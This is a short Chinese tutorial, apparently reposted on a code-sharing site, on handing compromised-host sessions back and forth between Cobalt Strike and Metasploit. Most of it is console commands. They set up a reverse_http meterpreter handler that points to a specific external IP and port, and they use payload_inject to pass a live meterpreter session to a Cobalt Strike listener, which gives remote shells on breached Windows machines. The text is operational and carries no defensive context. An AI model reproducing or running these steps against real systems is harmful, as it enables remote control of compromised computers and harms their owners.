CS與msf的shell互相傳遞


一、CS的session轉到msf上

1、cs上線一台pc

2、設置msf監聽

        msfconsole

        use exploit/multi/handler

        set payload windows/meterpreter/reverse_http(這里注意不是TCP,cs4.2我沒找到外連TCP的)

        set lhost 103.234.72.5

        set lport 10086

        show options

        exploit

3、cs設置監聽器

        右擊spawn,選擇這個監聽器。

        回到msf可以看到機器已經上線。

        sessions -l 查看所有session

        session 1 進入第一個shell

        在里面輸入exit就斷開鏈接。

二、msf的session轉到CS上

1、首先把msf上獲取到的meterpreter掛在后台運行

        執行命令:background,即可

2、然后使用 exploit/windows/local/payload_inject來注入一個新的payload到session中,具體命令如下:

        use exploit/windows/local/payload_inject

        set payload windows/meterpreter/reverse_http

        set LHOST 103.234.72.5 //cs主機地址

        set LPORT 84 //隨意設置監聽端口,需要和cs保持一致

        set session 2 //設置需要派送的meterpreter

        set DisablePayloadHandler true //禁止產生一個新的handler

        可以看到cs那邊機器已經上線。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM